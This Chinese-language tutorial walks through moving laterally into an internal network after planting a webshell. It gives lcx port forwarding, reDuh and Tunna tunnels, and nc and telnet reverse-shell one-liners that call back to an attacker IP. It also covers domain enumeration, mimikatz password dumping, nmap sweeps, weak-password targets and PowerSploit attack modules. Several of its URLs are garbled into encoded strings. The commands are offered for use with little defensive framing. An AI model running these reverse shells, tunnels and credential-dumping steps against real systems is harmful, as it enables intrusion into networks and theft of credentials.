当我们获取到一个webshell的时候，发现外网ip无法链接，但3389开放，那很有可能是内网服务器，下面我们将介绍几款有关内网转发的工具。

内网转发的工具

1、Lcx.exe工具使用

首先远程目标系统要开启远程访问功能（若未开可通过开3389命令开启）.

lcx.exe是个端口转发工具，相当于把肉鸡A上的3389端口转发到B机上，当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。

首先在本地进行监听，监听51端口并转发到33891端口

lcx.exe -listen 51 33891

在webshell中运行

lcx.exe -slave 192.168.1.100 51 192.168.80.139 3389

远程桌面访问33891端口

使用创建的用户名密码登录服务器

2、Reduh内网反弹

服务端是个webshell（针对不同服务器有aspx,php,jsp三个版本），客户端是java写的，本地要安装jdk。
这里我们以php网站为例，首先将php文件上传到服务器端。

浏览器中访问上传的webshell，提示以下内容说明解析成功

用客户端连接服务端

java -jar reDuhClient.jar a6cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0R3H3i4K6u0W2x3e0x3&6i4K6u0r3P5Y4k6#2L8r3c8J5K9h3I4D9i4K6u0r3M7X3g2p5N6h3S2Q4x3X3g2H3K9s2l9`.

本地连接1010端口

nc.exe -vv localhost 1010
[createTunnel]1235:127.0.0.1:3389

远程登录

3、Tunna内网反弹

以下为后门文件，该工具是Python所写，需要Python环境，同样有jsp、aspx、php版本的webshell

这里使用php网站进行测试，上传php后门

python proxy.py -u 390K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0R3H3i4K6u0W2x3e0x3&6i4K6u0r3P5Y4k6#2L8r3c8J5K9h3I4D9i4K6u0r3j5$3!0F1L8W2)9J5k6i4m8Z5M7q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3X3c8D9i4K6t1$3L8X3u0K6M7q4)9K6b7U0p5J5x3K6c8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0V1M7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1K6x3K6R3&6i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5k6s2k6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4@1f1J5i4K6R3H3i4K6V1K6M7H3`.`.

远程连接

4、Linux系统通过nc反弹shell

首先，攻击端进行监听

nc.exe -lvnp 2333

服务器端执行

mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc 192.168.1.101 2333 1>/tmp/backpipe

Ip为攻击端ip

执行命令，查看发现反弹成功

5、内置命令反弹

nc.exe -lvnp 2333

服务器端执行

mknod /tmp/backpipe p

telnet 192.168.1.101 2333 0<backpipe | /bin/bash 1>backpipe

反弹成功

获取更多服务器

上面讲了我们如何进入进入一台内网系统，既然我们已经获得了一台内网服务，那么我们如何获取更多服务器呢

我们可能会想到目标系统是什么，安装了哪些应用，可能存在的漏洞等等。
同样，我们需要收集信息，来帮助更好的入侵其他主机，下面是一些常用的cmd命令，还有很多可自行学习

net user                               ------ 本机用户列表 
net localhroup administrators          ------ 本机管理员[通常含有域用户] 
net user /domain                       ------ 查询域用户 
net group /domain                      ------ 查询域里面的工作组
net group "domain admins" /domain      ------ 查询域管理员用户组 
net localgroup administrators /domain  ------ 登录本机的域管理员
net time /domain                       ------ 判断主域，主域服务器都做时间服务器 
net config workstation                 ------ 当前登录域

密码获取

既然已经拿下服务器，那么我们就要获得服务器的密码，windows可以使用mimikatz获取用户名及密码，因为很有可能管理员将其他系统设置成相同的用户名密码。所以在其他内网系统可能同样适用。

可以看到既有hash值，也有明文用户名密码。

主机探测

既然已经在一个内网，我们首先应该想到的就是探测有什么服务器，有哪些开放端口等等，可以使用nmap，扫描C段，看看有多少台在线服务器。

扫描存活主机，既然是扫描存活主机，那么当然越快越好（个人喜好）

nmap -PE -sn -T4 192.168.80.1/24

我们已经知道那些ip是存活主机，那么就可以进一步获取各个系统的开放端口

nmap -sS -sV -O -p0-65535 192.168.80.145

可以看到开放的端口以及服务等服务器信息

同样，在内网也会存在很多不打系统补丁的情况，类似这次“WannaCry”虽然补丁已经出现一段时间，各大安全公司也好，各个安全部门也好都会提前预警打补丁，但是呢,你懂的，所以说，对某些不需要使用的端口及服务，直接停掉，以免临时抱佛脚，伤不起啊……
如果有系统漏洞，那么我们就可以使用matesploit进行溢出攻击等等

弱口令

同样，弱口令也是内网拿服务器的手段，说到弱口令就不得不说1433的mssql，3306的mysql，1521的Oracle，10050 的zabbix，7001的weblogic，8080的tomcat等等，都会存在弱口令的情况，但也存在被修改的情况，不过管理员嘛都是怕麻烦，会存在各种规律以免自己忘记，甚至有些管理员直接将某些账号密码写到某个文件夹中，这看你喽……

嗅探

也可以使用嗅探方法，如Cain，可以探测本地程序缓存的密码，通过嗅探器可以嗅探到相邻机器的username和password.。

powershell & PowerSploit

powershell

powershell基础学习，如果想了解powershell渗透测试原理，需要进行简单脚本开发。推荐网址：fe2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8K6N6r3W2H3M7#2)9J5k6h3&6W2N6q4)9J5c8Y4m8G2N6$3g2J5M7$3S2W2L8r3I4Q4x3X3c8W2P5r3g2U0N6i4c8A6L8X3N6Q4x3X3c8W2P5s2c8W2M7X3&6S2L8q4)9J5k6r3y4G2L8h3#2S2L8X3c8K6i4K6u0W2K9s2c8E0L8l9`.`.

基础部分就不给大家在细介绍，大家可以根据提供网址进行学习。

Powershell的优秀之处

1. 代码运行在内存中可以不去接触磁盘
2. 从另一个系统中下载代码并执行
3. 很多安全产品并不能监测到powershell的活动
4. cmd.exe通常被阻止运行，但是powershell不会。

本次主要是简单介绍下powersploit，后续会出一套关于powershell系列课程。

PowerSploit

PowerSploit是GitHub上面的一个安全项目，上面有很多powershell攻击脚本，它们主要被用来渗透中的信息侦察、权限提升、权限维持。

项目地址：f64K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6b7L8%4N6W2M7W2y4Z5k6h3I4D9e0h3q4X3K9h3q4Q4x3V1k6b7L8%4N6W2M7W2y4H3L8r3!0A6N6l9`.`.

代码执行（CodeExecution）

• Invoke-DllInjection

• Invoke-ReflectivePEInjection

• Invoke-Shellcode

• Invoke-WmiCommand

脚本修改（ScriptModification）

• Out-EncodedCommand

• Out-CompressedDll

• Out-EncryptedScript

• Remove-Comments

权限维持（Persistence）

• New-UserPersistenceOption

• New-ElevatedPersistenceOption

• Add-Persistence

• Install-SSP

• Get-SecurityPackages

绕过杀毒软件（AntivirusBypass）

• Find-AVSignature

信息收集（Exfiltration）

• 这个文件夹主要是收集目标主机上的信息。

信息侦察（Recon）

• 这个文件夹主要是以目标主机为跳板进行内网主机侦察。

由于公众号长度不可控，下节会接着讲powershell系列，利用powershell进行内网渗透、密码嗅探、端口扫描等操作。

[培训]科锐逆向工程师培训第53期2025年7月8日开班！